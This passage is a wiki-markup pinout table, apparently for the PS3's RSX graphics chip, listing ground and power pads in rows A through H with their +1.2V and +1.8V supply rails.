RSX_FBVDDQ<br /> |-<br /> | A38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A39 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | B<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | B2 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B3 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B4 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B6 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B7 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B8 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B9 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B10 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B11 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B12 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B13 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B14 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B16 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B18 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B20 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B22 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B24 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B26 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B28 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B29 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | B30 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | B31 || VDDMON || &amp;gt; RSX_VDDMONI<br /> |-<br /> | B32 || style=&quot;color:white; background-color:#ff3333;&quot; | MPLL0_VDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_PLL_VDD<br /> |-<br /> | B34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | C<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | C1 || || <br /> |-<br /> | C2 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C3 || || <br /> |-<br /> | C4 || || <br /> |-<br /> | C5 || || <br /> |-<br /> | C6 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C7 || || <br /> |-<br /> | C8 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C9 || || <br /> |-<br /> | C10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C11 || || <br /> |-<br /> | C12 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C13 || || <br /> |-<br /> | C14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C15 || || <br /> |-<br /> | C16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C17 || || <br /> |-<br /> | C18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C19 || || <br /> |-<br /> | C20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C21 || || <br /> |-<br /> | C22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C23 || || <br /> |-<br /> | C24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C25 || || <br /> |-<br /> | C26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C27 || || <br /> |-<br /> | C28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C29 || || <br /> |-<br /> | C30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C31 || || <br /> |-<br /> | C32 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C33 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C35 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C41 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | D<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | D3 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D4 || || <br /> |-<br /> | D5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D6 || || <br /> |-<br /> | D7 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D8 || || <br /> |-<br /> | D9 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D10 || || <br /> |-<br /> | D11 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D12 || || <br /> |-<br /> | D13 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D14 || || <br /> |-<br /> | D15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D16 || || <br /> |-<br /> | D17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D18 || || <br /> |-<br /> | D19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D20 || || <br /> |-<br /> | D21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D22 || || <br /> |-<br /> | D23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D24 || || <br /> |-<br /> | D25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D26 || || <br /> |-<br /> | D27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D28 || || <br /> |-<br /> | D29 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D30 || || <br /> |-<br /> | D31 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D32 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D33 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D36 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D37 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | E<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | E1 || || <br /> |-<br /> | E2 || || <br /> |-<br /> | E3 || || <br /> |-<br /> | E4 || || <br /> |-<br /> | E5 || || <br /> |-<br /> | E6 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E7 || || <br /> |-<br /> | E8 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E9 || || <br /> |-<br /> | E10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E11 || || <br /> |-<br /> | E12 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E13 || || <br /> |-<br /> | E14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E15 || || <br /> |-<br /> | E16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E17 || || <br /> |-<br /> | E18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E19 || || <br /> |-<br /> | E20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E21 || || <br /> |-<br /> | E22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E23 || || <br /> |-<br /> | E24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E25 || || <br /> |-<br /> | E26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E27 || || <br /> |-<br /> | E28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E29 || || <br /> |-<br /> | E30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E31 || || <br /> |-<br /> | E32 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | E33 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | E34 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E35 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground <br /> |-<br /> | E36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | E37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | E38 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | F<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | F3 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F4 || || <br /> |-<br /> | F5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F6 || || <br /> |-<br /> | F7 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F8 || || <br /> |-<br /> | F9 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F10 || || <br /> |-<br /> | F11 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F12 || || <br /> |-<br /> | F13 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F14 || || <br /> |-<br /> | F15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F16 || || <br /> |-<br /> | F17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F18 || || <br /> |-<br /> | F19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F20 || || <br /> |-<br /> | F21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F22 || || <br /> |-<br /> | F23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F24 || || <br /> |-<br /> | F25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F26 || || <br /> |-<br /> | F27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F28 || || <br /> |-<br /> | F29 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F30 || || <br /> |-<br /> | F31 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F32 || || <br /> |-<br /> | F33 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F34 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F37 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F41 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | G<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | G1 || || <br /> |-<br /> | G2 || || <br /> |-<br /> | G3 || || <br /> |-<br /> | G4 || || <br /> |-<br /> | G5 || || <br /> |-<br /> | G6 || || <br /> |-<br /> | G7 || || <br /> |-<br /> | G8 || || <br /> |-<br /> | G9 || || <br /> |-<br /> | G10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G11 || || <br /> |-<br /> | G12 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G13 || || <br /> |-<br /> | G14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G15 || || <br /> |-<br /> | G16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G17 || || <br /> |-<br /> | G18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G19 || || <br /> |-<br /> | G20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G21 || || <br /> |-<br /> | G22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G23 || || <br /> |-<br /> | G24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G25 || || <br /> |-<br /> | G26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G27 || || <br /> |-<br /> | G28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G29 || || <br /> |-<br /> | G30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground <br /> |-<br /> | G31 || || <br /> |-<br /> | G32 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G33 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G35 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G41 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | H<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | H3 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground <br /> |-<br /> | H4 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H6 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H7 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H8 || || <br /> |-<br /> | H9 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H10 || || <br /> |-<br /> | H11 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H12 || || <br /> |-<br /> | H13 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H14 || || <br /> |-<br /> | H15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H16 || || <br /> |-<br /> | H17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H18 || || <br /> |-<br /> | H19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground <br /> |-<br /> | H20 || || <br /> |-<br /> | H21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H22 || || <br /> |-<br /> | H23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H24 || || <br /> |-<br /> | H25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H26 || || <br /> |-<br /> | H27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H28 || || <br /> |-<br /> | H29 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H30 || || <br /> |-<br /> | H31 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H32 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H33 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H34 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H36 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H37 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || 